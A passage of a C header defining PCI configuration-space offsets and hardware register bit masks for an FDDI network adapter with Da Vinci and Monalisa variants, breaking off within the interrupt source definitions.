#ifdef	PCI

/*
 * (DV) = only defined for Da Vinci
 * (ML) = only defined for Monalisa
 */

/*
 * Configuration Space header
 * (byte offsets into the standard PCI config space)
 */
#define	PCI_VENDOR_ID	0x00	/* 16 bit	Vendor ID */
#define	PCI_DEVICE_ID	0x02	/* 16 bit	Device ID */
#define	PCI_COMMAND	0x04	/* 16 bit	Command */
#define	PCI_STATUS	0x06	/* 16 bit	Status */
#define	PCI_REV_ID	0x08	/*  8 bit	Revision ID */
#define	PCI_CLASS_CODE	0x09	/* 24 bit	Class Code */
#define	PCI_CACHE_LSZ	0x0c	/*  8 bit	Cache Line Size */
#define	PCI_LAT_TIM	0x0d	/*  8 bit	Latency Timer */
#define	PCI_HEADER_T	0x0e	/*  8 bit	Header Type */
#define	PCI_BIST	0x0f	/*  8 bit	Built-in selftest */
#define	PCI_BASE_1ST	0x10	/* 32 bit	1st Base address */
#define	PCI_BASE_2ND	0x14	/* 32 bit	2nd Base address */
	/* Byte 18..2b:	Reserved */
#define	PCI_SUB_VID	0x2c	/* 16 bit	Subsystem Vendor ID */
#define	PCI_SUB_ID	0x2e	/* 16 bit	Subsystem ID */
#define	PCI_BASE_ROM	0x30	/* 32 bit	Expansion ROM Base Address */
	/* Byte 34..33:	Reserved */
#define	PCI_CAP_PTR	0x34	/*  8 bit (ML)	Capabilities Ptr */
	/* Byte 35..3b:	Reserved */
#define	PCI_IRQ_LINE	0x3c	/*  8 bit	Interrupt Line */
#define	PCI_IRQ_PIN	0x3d	/*  8 bit	Interrupt Pin */
#define	PCI_MIN_GNT	0x3e	/*  8 bit	Min_Gnt */
#define	PCI_MAX_LAT	0x3f	/*  8 bit	Max_Lat */
	/* Device Dependent Region */
#define	PCI_OUR_REG	0x40	/* 32 bit (DV)	Our Register */
#define	PCI_OUR_REG_1	0x40	/* 32 bit (ML)	Our Register 1 */
#define	PCI_OUR_REG_2	0x44	/* 32 bit (ML)	Our Register 2 */
	/* Power Management Region */
#define	PCI_PM_CAP_ID	0x48	/*  8 bit (ML)	Power Management Cap. ID */
#define	PCI_PM_NITEM	0x49	/*  8 bit (ML)	Next Item Ptr */
#define	PCI_PM_CAP_REG	0x4a	/* 16 bit (ML)	Power Management Capabilities */
#define	PCI_PM_CTL_STS	0x4c	/* 16 bit (ML)	Power Manag. Control/Status */
	/* Byte 0x4e:	Reserved */
#define	PCI_PM_DAT_REG	0x4f	/*  8 bit (ML)	Power Manag. Data Register */
	/* VPD Region */
#define	PCI_VPD_CAP_ID	0x50	/*  8 bit (ML)	VPD Cap. ID */
#define	PCI_VPD_NITEM	0x51	/*  8 bit (ML)	Next Item Ptr */
#define	PCI_VPD_ADR_REG	0x52	/* 16 bit (ML)	VPD Address Register */
#define	PCI_VPD_DAT_REG	0x54	/* 32 bit (ML)	VPD Data Register */
	/* Byte 58..ff:	Reserved */

/*
 * I2C Address (PCI Config)
 *
 * Note: The temperature and voltage sensors are relocated on a different
 *	 I2C bus.
 */
#define I2C_ADDR_VPD	0xA0	/* I2C address for the VPD EEPROM */

/*
 * Define Bits and Values of the registers
 */
/*	PCI_VENDOR_ID	16 bit	Vendor ID */
/*	PCI_DEVICE_ID	16 bit	Device ID */
/* Values for Vendor ID and Device ID shall be patched into the code */
/*	PCI_COMMAND	16 bit	Command */
#define	PCI_FBTEN	0x0200	/* Bit 9: Fast Back-To-Back enable */
#define	PCI_SERREN	0x0100	/* Bit 8: SERR enable */
#define	PCI_ADSTEP	0x0080	/* Bit 7: Address Stepping */
#define	PCI_PERREN	0x0040	/* Bit 6: Parity Report Response enable */
#define	PCI_VGA_SNOOP	0x0020	/* Bit 5: VGA palette snoop */
#define	PCI_MWIEN	0x0010	/* Bit 4: Memory write and inv cycl ena */
#define	PCI_SCYCEN	0x0008	/* Bit 3: Special Cycle enable */
#define	PCI_BMEN	0x0004	/* Bit 2: Bus Master enable */
#define	PCI_MEMEN	0x0002	/* Bit 1: Memory Space Access enable */
#define	PCI_IOEN	0x0001	/* Bit 0: IO Space Access enable */

/*	PCI_STATUS	16 bit	Status */
#define	PCI_PERR	0x8000	/* Bit 15: Parity Error */
#define	PCI_SERR	0x4000	/* Bit 14: Signaled SERR */
#define	PCI_RMABORT	0x2000	/* Bit 13: Received Master Abort */
#define	PCI_RTABORT	0x1000	/* Bit 12: Received Target Abort */
#define	PCI_STABORT	0x0800	/* Bit 11: Sent Target Abort */
#define	PCI_DEVSEL	0x0600	/* Bit 10..9: DEVSEL Timing */
#define	PCI_DEV_FAST	(0<<9)	/*	fast */
#define	PCI_DEV_MEDIUM	(1<<9)	/*	medium */
#define	PCI_DEV_SLOW	(2<<9)	/*	slow */
#define	PCI_DATAPERR	0x0100	/* Bit 8: DATA Parity error detected */
#define	PCI_FB2BCAP	0x0080	/* Bit 7: Fast Back-to-Back Capability */
#define	PCI_UDF		0x0040	/* Bit 6: User Defined Features */
#define	PCI_66MHZCAP	0x0020	/* Bit 5: 66 MHz PCI bus clock capable */
#define	PCI_NEWCAP	0x0010	/* Bit 4: New cap. list implemented */

/* mask of the sticky error bits that need write-1-to-clear handling */
#define	PCI_ERRBITS	(PCI_PERR|PCI_SERR|PCI_RMABORT|PCI_STABORT|PCI_DATAPERR)

/*	PCI_REV_ID	8 bit	Revision ID */
/*	PCI_CLASS_CODE	24 bit	Class Code */
/*	Byte 2:		Base Class		(02) */
/*	Byte 1:		SubClass		(02) */
/*	Byte 0:		Programming Interface	(00) */
/*	PCI_CACHE_LSZ	8 bit	Cache Line Size */
/*	Possible values: 0,2,4,8,16 */
/*	PCI_LAT_TIM	8 bit	Latency Timer */

/*	PCI_HEADER_T	8 bit	Header Type */
#define	PCI_HD_MF_DEV	0x80	/* Bit 7:	0= single, 1= multi-func dev */
#define	PCI_HD_TYPE	0x7f	/* Bit 6..0:	Header Layout 0= normal */

/*	PCI_BIST	8 bit	Built-in selftest */
#define	PCI_BIST_CAP	0x80	/* Bit 7:	BIST Capable */
#define	PCI_BIST_ST	0x40	/* Bit 6:	Start BIST */
#define	PCI_BIST_RET	0x0f	/* Bit 3..0:	Completion Code */

/*	PCI_BASE_1ST	32 bit	1st Base address */
#define	PCI_MEMSIZE	0x800L		/* use 2 kB Memory Base */
#define	PCI_MEMBASE_BITS 0xfffff800L	/* Bit 31..11:	Memory Base Address */
#define	PCI_MEMSIZE_BIIS 0x000007f0L	/* Bit 10..4:	Memory Size Req. */
#define	PCI_PREFEN	0x00000008L	/* Bit 3:	Prefetchable */
#define	PCI_MEM_TYP	0x00000006L	/* Bit 2..1:	Memory Type */
#define	PCI_MEM32BIT	(0<<1)		/* Base addr anywhere in 32 Bit range */
#define	PCI_MEM1M	(1<<1)		/* Base addr below 1 MegaByte */
#define	PCI_MEM64BIT	(2<<1)		/* Base addr anywhere in 64 Bit range */
#define	PCI_MEMSPACE	0x00000001L	/* Bit 0:	Memory Space Indic. */

/*	PCI_BASE_2ND	32 bit	2nd Base address */
#define	PCI_IOBASE	0xffffff00L	/* Bit 31..8:	I/O Base address */
#define	PCI_IOSIZE	0x000000fcL	/* Bit 7..2:	I/O Size Requirements */
#define	PCI_IOSPACE	0x00000001L	/* Bit 0:	I/O Space Indicator */

/*	PCI_SUB_VID	16 bit	Subsystem Vendor ID */
/*	PCI_SUB_ID	16 bit	Subsystem ID */

/*	PCI_BASE_ROM	32 bit	Expansion ROM Base Address */
#define	PCI_ROMBASE	0xfffe0000L	/* Bit 31..17:	ROM BASE address (1st) */
#define	PCI_ROMBASZ	0x0001c000L	/* Bit 16..14:	Treat as BASE or SIZE */
#define	PCI_ROMSIZE	0x00003800L	/* Bit 13..11:	ROM Size Requirements */
#define	PCI_ROMEN	0x00000001L	/* Bit 0:	Address Decode enable */

/*	PCI_CAP_PTR	8 bit	New Capabilities Pointers */
/*	PCI_IRQ_LINE	8 bit	Interrupt Line */
/*	PCI_IRQ_PIN	8 bit	Interrupt Pin */
/*	PCI_MIN_GNT	8 bit	Min_Gnt */
/*	PCI_MAX_LAT	8 bit	Max_Lat */
/* Device Dependent Region */
/*	PCI_OUR_REG	(DV)	32 bit	Our Register */
/*	PCI_OUR_REG_1	(ML)	32 bit	Our Register 1 */
	/* Bit 31..29:	reserved */
#define	PCI_PATCH_DIR	(3L<<27)	/*(DV) Bit 28..27: Ext Patchs direction */
#define	PCI_PATCH_DIR_0	(1L<<27)	/*(DV) Type of the pins EXT_PATCHS<1..0> */
#define	PCI_PATCH_DIR_1	(1L<<28)	/*	0 = input */
					/*	1 = output */
#define	PCI_EXT_PATCHS	(3L<<25)	/*(DV) Bit 26..25: Extended Patches */
#define	PCI_EXT_PATCH_0	(1L<<25)	/*(DV) */
#define	PCI_EXT_PATCH_1	(1L<<26)	/*	CLK for MicroWire (ML) */
#define	PCI_VIO		(1L<<25)	/*(ML) */
#define	PCI_EN_BOOT	(1L<<24)	/* Bit 24: Enable BOOT via ROM */
					/*	1 = Don't boot with ROM */
					/*	0 = Boot with ROM */
#define	PCI_EN_IO	(1L<<23)	/* Bit 23: Mapping to IO space */
#define	PCI_EN_FPROM	(1L<<22)	/* Bit 22: FLASH mapped to mem? */
					/*	1 = Map Flash to Memory */
					/*	0 = Disable all addr. decoding */
#define	PCI_PAGESIZE	(3L<<20)	/* Bit 21..20: FLASH Page Size	*/
#define	PCI_PAGE_16	(0L<<20)	/*	16 k pages	*/
#define	PCI_PAGE_32K	(1L<<20)	/*	32 k pages	*/
#define	PCI_PAGE_64K	(2L<<20)	/*	64 k pages	*/
#define	PCI_PAGE_128K	(3L<<20)	/*	128 k pages	*/
					/* Bit 19: reserved (ML) and (DV) */
#define	PCI_PAGEREG	(7L<<16)	/* Bit 18..16: Page Register	*/
					/* Bit 15: reserved	*/
#define	PCI_FORCE_BE	(1L<<14)	/* Bit 14: Assert all BEs on MR	*/
#define	PCI_DIS_MRL	(1L<<13)	/* Bit 13: Disable Mem R Line	*/
#define	PCI_DIS_MRM	(1L<<12)	/* Bit 12: Disable Mem R multip	*/
#define	PCI_DIS_MWI	(1L<<11)	/* Bit 11: Disable Mem W & inv	*/
#define	PCI_DISC_CLS	(1L<<10)	/* Bit 10: Disc: cacheLsz bound	*/
#define	PCI_BURST_DIS	(1L<<9)		/* Bit 9: Burst Disable	*/
#define	PCI_BYTE_SWAP	(1L<<8)		/*(DV) Bit 8: Byte Swap in DATA	*/
#define	PCI_SKEW_DAS	(0xfL<<4)	/* Bit 7..4: Skew Ctrl, DAS Ext	*/
#define	PCI_SKEW_BASE	(0xfL<<0)	/* Bit 3..0: Skew Ctrl, Base	*/

/*	PCI_OUR_REG_2	(ML)	32 bit	Our Register 2 (Monalisa only) */
#define	PCI_VPD_WR_TH	(0xffL<<24)	/* Bit 24..31	VPD Write Threshold */
#define	PCI_DEV_SEL	(0x7fL<<17)	/* Bit 17..23	EEPROM Device Select */
#define	PCI_VPD_ROM_SZ	(7L<<14)	/* Bit 14..16	VPD ROM Size	*/
					/* Bit 12..13	reserved	*/
#define	PCI_PATCH_DIR2	(0xfL<<8)	/* Bit 8..11	Ext Patchs dir 2..5 */
#define	PCI_PATCH_DIR_2	(1L<<8)		/* Bit 8	CS for MicroWire */
#define	PCI_PATCH_DIR_3	(1L<<9)
#define	PCI_PATCH_DIR_4	(1L<<10)
#define	PCI_PATCH_DIR_5	(1L<<11)
#define	PCI_EXT_PATCHS2	(0xfL<<4)	/* Bit 4..7	Extended Patches */
#define	PCI_EXT_PATCH_2	(1L<<4)		/* Bit 4	CS for MicroWire */
#define	PCI_EXT_PATCH_3	(1L<<5)
#define	PCI_EXT_PATCH_4	(1L<<6)
#define	PCI_EXT_PATCH_5	(1L<<7)
#define	PCI_EN_DUMMY_RD	(1L<<3)		/* Bit 3	Enable Dummy Read */
#define	PCI_REV_DESC	(1L<<2)		/* Bit 2	Reverse Desc. Bytes */
#define	PCI_USEADDR64	(1L<<1)		/* Bit 1	Use 64 Bit Address */
#define	PCI_USEDATA64	(1L<<0)		/* Bit 0	Use 64 Bit Data bus ext*/

/* Power Management Region */
/*	PCI_PM_CAP_ID	 8 bit (ML)	Power Management Cap. ID */
/*	PCI_PM_NITEM	 8 bit (ML)	Next Item Ptr */
/*	PCI_PM_CAP_REG	16 bit (ML)	Power Management Capabilities*/
#define	PCI_PME_SUP	(0x1f<<11)	/* Bit 11..15	PM Manag. Event Support*/
#define	PCI_PM_D2_SUB	(1<<10)		/* Bit 10	D2 Support Bit	*/
#define	PCI_PM_D1_SUB	(1<<9)		/* Bit 9	D1 Support Bit	*/
					/* Bit 6..8	reserved	*/
#define	PCI_PM_DSI	(1<<5)		/* Bit 5	Device Specific Init.*/
#define	PCI_PM_APS	(1<<4)		/* Bit 4	Auxiliary Power Src */
#define	PCI_PME_CLOCK	(1<<3)		/* Bit 3	PM Event Clock	*/
#define	PCI_PM_VER	(7<<0)		/* Bit 0..2	PM PCI Spec. version */

/*	PCI_PM_CTL_STS	16 bit (ML)	Power Manag. Control/Status */
#define	PCI_PME_STATUS	(1<<15)		/* Bit 15	PFA doesn't sup. PME#*/
#define	PCI_PM_DAT_SCL	(3<<13)		/* Bit 13..14	dat reg Scaling factor */
#define	PCI_PM_DAT_SEL	(0xf<<9)	/* Bit 9..12	PM data selector field */
					/* Bit 7.. 2	reserved	*/
#define	PCI_PM_STATE	(3<<0)		/* Bit 0.. 1	Power Management State */
#define	PCI_PM_STATE_D0	(0<<0)		/* D0:	Operational (default) */
#define	PCI_PM_STATE_D1	(1<<0)		/* D1:	not supported */
#define	PCI_PM_STATE_D2	(2<<0)		/* D2:	not supported */
#define	PCI_PM_STATE_D3	(3<<0)		/* D3:	HOT, Power Down and Reset */

/*	PCI_PM_DAT_REG	 8 bit (ML)	Power Manag. Data Register */
/* VPD Region */
/*	PCI_VPD_CAP_ID	 8 bit (ML)	VPD Cap. ID */
/*	PCI_VPD_NITEM	 8 bit (ML)	Next Item Ptr */
/*	PCI_VPD_ADR_REG	16 bit (ML)	VPD Address Register */
#define	PCI_VPD_FLAG	(1<<15)		/* Bit 15	starts VPD rd/wd cycle*/

/*	PCI_VPD_DAT_REG	32 bit (ML)	VPD Data Register */

/*
 * Control Register File:
 * Bank 0
 */
#define	B0_RAP		0x0000	/*  8 bit register address port */
	/* 0x0001 - 0x0003:	reserved */
#define	B0_CTRL		0x0004	/*  8 bit control register */
#define	B0_DAS		0x0005	/*  8 Bit control register (DAS) */
#define	B0_LED		0x0006	/*  8 Bit LED register */
#define	B0_TST_CTRL	0x0007	/*  8 bit test control register */
#define	B0_ISRC		0x0008	/* 32 bit Interrupt source register */
#define	B0_IMSK		0x000c	/* 32 bit Interrupt mask register */

/* 0x0010 - 0x006b:	formac+ (supernet_3) frequently used registers */
#define	B0_CMDREG1	0x0010	/* write command reg 1 instruction */
#define	B0_CMDREG2	0x0014	/* write command reg 2 instruction */
#define	B0_ST1U		0x0010	/* read upper 16-bit of status reg 1 */
#define	B0_ST1L		0x0014	/* read lower 16-bit of status reg 1 */
#define	B0_ST2U		0x0018	/* read upper 16-bit of status reg 2 */
#define	B0_ST2L		0x001c	/* read lower 16-bit of status reg 2 */

#define	B0_MARR		0x0020	/* r/w the memory read addr register */
#define	B0_MARW		0x0024	/* r/w the memory write addr register*/
#define	B0_MDRU		0x0028	/* r/w upper 16-bit of mem. data reg */
#define	B0_MDRL		0x002c	/* r/w lower 16-bit of mem. data reg */

#define	B0_MDREG3	0x0030	/* r/w Mode Register 3 */
#define	B0_ST3U		0x0034	/* read upper 16-bit of status reg 3 */
#define	B0_ST3L		0x0038	/* read lower 16-bit of status reg 3 */
#define	B0_IMSK3U	0x003c	/* r/w upper 16-bit of IMSK reg 3 */
#define	B0_IMSK3L	0x0040	/* r/w lower 16-bit of IMSK reg 3 */
#define	B0_IVR		0x0044	/* read Interrupt Vector register */
#define	B0_IMR		0x0048	/* r/w Interrupt mask register */
/* 0x4c	Hidden */

#define	B0_CNTRL_A	0x0050	/* control register A (r/w) */
#define	B0_CNTRL_B	0x0054	/* control register B (r/w) */
#define	B0_INTR_MASK	0x0058	/* interrupt mask (r/w) */
#define	B0_XMIT_VECTOR	0x005c	/* transmit vector register (r/w) */

#define	B0_STATUS_A	0x0060	/* status register A (read only) */
#define	B0_STATUS_B	0x0064	/* status register B (read only) */
#define	B0_CNTRL_C	0x0068	/* control register C (r/w) */
#define	B0_MDREG1	0x006c	/* r/w Mode Register 1 */

#define	B0_R1_CSR	0x0070	/* 32 bit BMU control/status reg (rec q 1) */
#define	B0_R2_CSR	0x0074	/* 32 bit BMU control/status reg (rec q 2)(DV)*/
#define	B0_XA_CSR	0x0078	/* 32 bit BMU control/status reg (a xmit q) */
#define	B0_XS_CSR	0x007c	/* 32 bit BMU control/status reg (s xmit q) */

/*
 * Bank 1
 * - completely empty (this is the RAP Block window)
 * Note: if RAP = 1 this page is reserved
 */

/*
 * Bank 2
 */
#define	B2_MAC_0	0x0100	/* 8 bit MAC address Byte 0 */
#define	B2_MAC_1	0x0101	/* 8 bit MAC address Byte 1 */
#define	B2_MAC_2	0x0102	/* 8 bit MAC address Byte 2 */
#define	B2_MAC_3	0x0103	/* 8 bit MAC address Byte 3 */
#define	B2_MAC_4	0x0104	/* 8 bit MAC address Byte 4 */
#define	B2_MAC_5	0x0105	/* 8 bit MAC address Byte 5 */
#define	B2_MAC_6	0x0106	/* 8 bit MAC address Byte 6 (== 0) (DV) */
#define	B2_MAC_7	0x0107	/* 8 bit MAC address Byte 7 (== 0) (DV) */

#define	B2_CONN_TYP	0x0108	/* 8 bit Connector type */
#define	B2_PMD_TYP	0x0109	/* 8 bit PMD type */
	/* 0x010a - 0x010b:	reserved */
/* Eprom registers are currently of no use */
#define	B2_E_0		0x010c	/* 8 bit EPROM Byte 0 */
#define	B2_E_1		0x010d	/* 8 bit EPROM Byte 1 */
#define	B2_E_2		0x010e	/* 8 bit EPROM Byte 2 */
#define	B2_E_3		0x010f	/* 8 bit EPROM Byte 3 */

#define	B2_FAR		0x0110	/* 32 bit Flash-Prom Address Register/Counter */
#define	B2_FDP		0x0114	/* 8 bit Flash-Prom Data Port */
	/* 0x0115 - 0x0117:	reserved */
#define	B2_LD_CRTL	0x0118	/* 8 bit loader control */
#define	B2_LD_TEST	0x0119	/* 8 bit loader test */
	/* 0x011a - 0x011f:	reserved */

#define	B2_TI_INI	0x0120	/* 32 bit Timer init value */
#define	B2_TI_VAL	0x0124	/* 32 bit Timer value */
#define	B2_TI_CRTL	0x0128	/* 8 bit Timer control */
#define	B2_TI_TEST	0x0129	/* 8 Bit Timer Test */
	/* 0x012a - 0x012f:	reserved */

#define	B2_WDOG_INI	0x0130	/* 32 bit Watchdog init value */
#define	B2_WDOG_VAL	0x0134	/* 32 bit Watchdog value */
#define	B2_WDOG_CRTL	0x0138	/* 8 bit Watchdog control */
#define	B2_WDOG_TEST	0x0139	/* 8 Bit Watchdog Test */
	/* 0x013a - 0x013f:	reserved */

#define	B2_RTM_INI	0x0140	/* 32 bit RTM init value */
#define	B2_RTM_VAL	0x0144	/* 32 bit RTM value */
#define	B2_RTM_CRTL	0x0148	/* 8 bit RTM control */
#define	B2_RTM_TEST	0x0149	/* 8 Bit RTM Test */

#define	B2_TOK_COUNT	0x014c	/* (ML)	32 bit	Token Counter */
#define	B2_DESC_ADDR_H	0x0150	/* (ML)	32 bit	Descriptor Base Addr Reg High */
#define	B2_CTRL_2	0x0154	/* (ML)	 8 bit	Control Register 2 */
#define	B2_IFACE_REG	0x0155	/* (ML)	 8 bit	Interface Register */
	/* 0x0156:		reserved */
#define	B2_TST_CTRL_2	0x0157	/* (ML)	 8 bit	Test Control Register 2 */
#define	B2_I2C_CTRL	0x0158	/* (ML)	32 bit	I2C Control Register */
#define	B2_I2C_DATA	0x015c	/* (ML)	32 bit	I2C Data Register */

#define	B2_IRQ_MOD_INI	0x0160	/* (ML)	32 bit	IRQ Moderation Timer Init Reg. */
#define	B2_IRQ_MOD_VAL	0x0164	/* (ML)	32 bit	IRQ Moderation Timer Value */
#define	B2_IRQ_MOD_CTRL	0x0168	/* (ML)	 8 bit	IRQ Moderation Timer Control */
#define	B2_IRQ_MOD_TEST	0x0169	/* (ML)	 8 bit	IRQ Moderation Timer Test */
	/* 0x016a - 0x017f:	reserved */

/*
 * Bank 3
 */
/*
 * This is a copy of the Configuration register file (lower half)
 */
#define	B3_CFG_SPC	0x180

/*
 * Bank 4
 */
#define	B4_R1_D		0x0200	/* 4*32 bit current receive Descriptor	*/
#define	B4_R1_DA	0x0210	/* 32 bit current rec desc address	*/
#define	B4_R1_AC	0x0214	/* 32 bit current receive Address Count	*/
#define	B4_R1_BC	0x0218	/* 32 bit current receive Byte Counter	*/
#define	B4_R1_CSR	0x021c	/* 32 bit BMU Control/Status Register	*/
#define	B4_R1_F		0x0220	/* 32 bit flag register			*/
#define	B4_R1_T1	0x0224	/* 32 bit Test Register 1		*/
#define	B4_R1_T1_TR	0x0224	/* 8 bit Test Register 1 TR		*/
#define	B4_R1_T1_WR	0x0225	/* 8 bit Test Register 1 WR		*/
#define	B4_R1_T1_RD	0x0226	/* 8 bit Test Register 1 RD		*/
#define	B4_R1_T1_SV	0x0227	/* 8 bit Test Register 1 SV		*/
#define	B4_R1_T2	0x0228	/* 32 bit Test Register 2		*/
#define	B4_R1_T3	0x022c	/* 32 bit Test Register 3		*/
#define	B4_R1_DA_H	0x0230	/* (ML)	32 bit Curr Rx Desc Address High */
#define	B4_R1_AC_H	0x0234	/* (ML)	32 bit Curr Addr Counter High dword */
	/* 0x0238 - 0x023f:	reserved */

/* Receive queue 2 is removed on Monalisa */
#define	B4_R2_D		0x0240	/* 4*32 bit current receive Descriptor (q2) */
#define	B4_R2_DA	0x0250	/* 32 bit current rec desc address (q2)	*/
#define	B4_R2_AC	0x0254	/* 32 bit current receive Address Count (q2) */
#define	B4_R2_BC	0x0258	/* 32 bit current receive Byte Counter (q2) */
#define	B4_R2_CSR	0x025c	/* 32 bit BMU Control/Status Register (q2) */
#define	B4_R2_F		0x0260	/* 32 bit flag register (q2)		*/
#define	B4_R2_T1	0x0264	/* 32 bit Test Register 1 (q2)		*/
#define	B4_R2_T1_TR	0x0264	/* 8 bit Test Register 1 TR (q2)	*/
#define	B4_R2_T1_WR	0x0265	/* 8 bit Test Register 1 WR (q2)	*/
#define	B4_R2_T1_RD	0x0266	/* 8 bit Test Register 1 RD (q2)	*/
#define	B4_R2_T1_SV	0x0267	/* 8 bit Test Register 1 SV (q2)	*/
#define	B4_R2_T2	0x0268	/* 32 bit Test Register 2 (q2)		*/
#define	B4_R2_T3	0x026c	/* 32 bit Test Register 3 (q2)		*/
	/* 0x0270 - 0x027c:	reserved */

/*
 * Bank 5
 */
#define	B5_XA_D		0x0280	/* 4*32 bit current transmit Descriptor (xa) */
#define	B5_XA_DA	0x0290	/* 32 bit current tx desc address (xa)	*/
#define	B5_XA_AC	0x0294	/* 32 bit current tx Address Count (xa)	*/
#define	B5_XA_BC	0x0298	/* 32 bit current tx Byte Counter (xa)	*/
#define	B5_XA_CSR	0x029c	/* 32 bit BMU Control/Status Register (xa) */
#define	B5_XA_F		0x02a0	/* 32 bit flag register (xa)		*/
#define	B5_XA_T1	0x02a4	/* 32 bit Test Register 1 (xa)		*/
#define	B5_XA_T1_TR	0x02a4	/* 8 bit Test Register 1 TR (xa)	*/
#define	B5_XA_T1_WR	0x02a5	/* 8 bit Test Register 1 WR (xa)	*/
#define	B5_XA_T1_RD	0x02a6	/* 8 bit Test Register 1 RD (xa)	*/
#define	B5_XA_T1_SV	0x02a7	/* 8 bit Test Register 1 SV (xa)	*/
#define	B5_XA_T2	0x02a8	/* 32 bit Test Register 2 (xa)		*/
#define	B5_XA_T3	0x02ac	/* 32 bit Test Register 3 (xa)		*/
#define	B5_XA_DA_H	0x02b0	/* (ML)	32 bit Curr Tx Desc Address High */
#define	B5_XA_AC_H	0x02b4	/* (ML)	32 bit Curr Addr Counter High dword */
	/* 0x02b8 - 0x02bc:	reserved */

#define	B5_XS_D		0x02c0	/* 4*32 bit current transmit Descriptor (xs) */
#define	B5_XS_DA	0x02d0	/* 32 bit current tx desc address (xs)	*/
#define	B5_XS_AC	0x02d4	/* 32 bit current transmit Address Count(xs) */
#define	B5_XS_BC	0x02d8	/* 32 bit current transmit Byte Counter (xs) */
#define	B5_XS_CSR	0x02dc	/* 32 bit BMU Control/Status Register (xs) */
#define	B5_XS_F		0x02e0	/* 32 bit flag register (xs)		*/
#define	B5_XS_T1	0x02e4	/* 32 bit Test Register 1 (xs)		*/
#define	B5_XS_T1_TR	0x02e4	/* 8 bit Test Register 1 TR (xs)	*/
#define	B5_XS_T1_WR	0x02e5	/* 8 bit Test Register 1 WR (xs)	*/
#define	B5_XS_T1_RD	0x02e6	/* 8 bit Test Register 1 RD (xs)	*/
#define	B5_XS_T1_SV	0x02e7	/* 8 bit Test Register 1 SV (xs)	*/
#define	B5_XS_T2	0x02e8	/* 32 bit Test Register 2 (xs)		*/
#define	B5_XS_T3	0x02ec	/* 32 bit Test Register 3 (xs)		*/
#define	B5_XS_DA_H	0x02f0	/* (ML)	32 bit Curr Tx Desc Address High */
#define	B5_XS_AC_H	0x02f4	/* (ML)	32 bit Curr Addr Counter High dword */
	/* 0x02f8 - 0x02fc:	reserved */

/*
 * Bank 6
 */
/* External PLC-S registers (SN2 compatibility for DV) */
/* External registers (ML) */
#define	B6_EXT_REG	0x300

/*
 * Bank 7
 */
/* DAS PLC-S Registers */

/*
 * Bank 8 - 15
 */
/* IFCP registers */

/*---------------------------------------------------------------------------*/
/* Definitions of the Bits in the registers */

/*	B0_RAP		16 bit register address port */
#define	RAP_RAP		0x0f	/* Bit 3..0:	0 = block0, .., f = block15 */

/*	B0_CTRL		8 bit control register */
#define	CTRL_FDDI_CLR	(1<<7)	/* Bit 7: (ML)	Clear FDDI Reset */
#define	CTRL_FDDI_SET	(1<<6)	/* Bit 6: (ML)	Set FDDI Reset */
#define	CTRL_HPI_CLR	(1<<5)	/* Bit 5:	Clear HPI SM reset */
#define	CTRL_HPI_SET	(1<<4)	/* Bit 4:	Set HPI SM reset */
#define	CTRL_MRST_CLR	(1<<3)	/* Bit 3:	Clear Master reset */
#define	CTRL_MRST_SET	(1<<2)	/* Bit 2:	Set Master reset */
#define	CTRL_RST_CLR	(1<<1)	/* Bit 1:	Clear Software reset */
#define	CTRL_RST_SET	(1<<0)	/* Bit 0:	Set Software reset */

/*	B0_DAS		8 Bit control register (DAS) */
#define	BUS_CLOCK	(1<<7)	/* Bit 7: (ML)	Bus Clock 0/1 = 33/66MHz */
#define	BUS_SLOT_SZ	(1<<6)	/* Bit 6: (ML)	Slot Size 0/1 = 32/64 bit slot*/
	/* Bit 5..4:	reserved */
#define	DAS_AVAIL	(1<<3)	/* Bit 3:	1 = DAS, 0 = SAS */
#define	DAS_BYP_ST	(1<<2)	/* Bit 2:	1 = avail,SAS, 0 = not avail */
#define	DAS_BYP_INS	(1<<1)	/* Bit 1:	1 = insert Bypass */
#define	DAS_BYP_RMV	(1<<0)	/* Bit 0:	1 = remove Bypass */

/*	B0_LED		8 Bit LED register */
	/* Bit 7..6:	reserved */
#define	LED_2_ON	(1<<5)	/* Bit 5:	1 = switch LED_2 on (left,gn)*/
#define	LED_2_OFF	(1<<4)	/* Bit 4:	1 = switch LED_2 off */
#define	LED_1_ON	(1<<3)	/* Bit 3:	1 = switch LED_1 on (mid,yel)*/
#define	LED_1_OFF	(1<<2)	/* Bit 2:	1 = switch LED_1 off */
#define	LED_0_ON	(1<<1)	/* Bit 1:	1 = switch LED_0 on (rght,gn)*/
#define	LED_0_OFF	(1<<0)	/* Bit 0:	1 = switch LED_0 off */

/* These hardware defines are very ugly therefore we define some others */
#define	LED_GA_ON	LED_2_ON	/* S port = A port */
#define	LED_GA_OFF	LED_2_OFF	/* S port = A port */
#define	LED_MY_ON	LED_1_ON
#define	LED_MY_OFF	LED_1_OFF
#define	LED_GB_ON	LED_0_ON
#define	LED_GB_OFF	LED_0_OFF

/*	B0_TST_CTRL	8 bit test control register */
#define	TST_FRC_DPERR_MR	(1<<7)	/* Bit 7: force DATAPERR on MST RE. */
#define	TST_FRC_DPERR_MW	(1<<6)	/* Bit 6: force DATAPERR on MST WR. */
#define	TST_FRC_DPERR_TR	(1<<5)	/* Bit 5: force DATAPERR on TRG RE. */
#define	TST_FRC_DPERR_TW	(1<<4)	/* Bit 4: force DATAPERR on TRG WR. */
#define	TST_FRC_APERR_M		(1<<3)	/* Bit 3: force ADDRPERR on MST */
#define	TST_FRC_APERR_T		(1<<2)	/* Bit 2: force ADDRPERR on TRG */
#define	TST_CFG_WRITE_ON	(1<<1)	/* Bit 1: ena configuration reg. WR */
#define	TST_CFG_WRITE_OFF	(1<<0)	/* Bit 0: dis configuration reg. WR */

/*	B0_ISRC		32 bit Interrupt source register */
	/* Bit 31..28:	reserved */
#define	IS_I2C_READY	(1L<<27)	/* Bit 27: (ML)	IRQ on end of I2C tx */
#define	IS_IRQ_SW	(1L<<26)	/* Bit 26: (ML)	SW forced IRQ	*/
#define	IS_EXT_REG	(1L<<25)	/* Bit 25: (ML)	IRQ from external reg*/
#define	IS_IRQ_STAT	(1L<<24)	/* Bit 24:	IRQ status exception */
					/*   PERR, RMABORT, RTABORT DATAPERR */
#define	IS_IRQ_MST_ERR	(1L<<23)	/* Bit 23:	IRQ master error */
					/*   RMABORT, RTABORT, DATAPERR */
#define	IS_TIMINT	(1L<<22)	/* Bit 22:	IRQ_TIMER */
#define	IS_TOKEN	(1L<<21)	/* Bit 21:	IRQ_RTM */
/*
 * Note: The DAS is our First Port (!=PA)
 */
#define	IS_PLINT1	(1L<<20)	/* Bit 20:	IRQ_PHY_DAS */
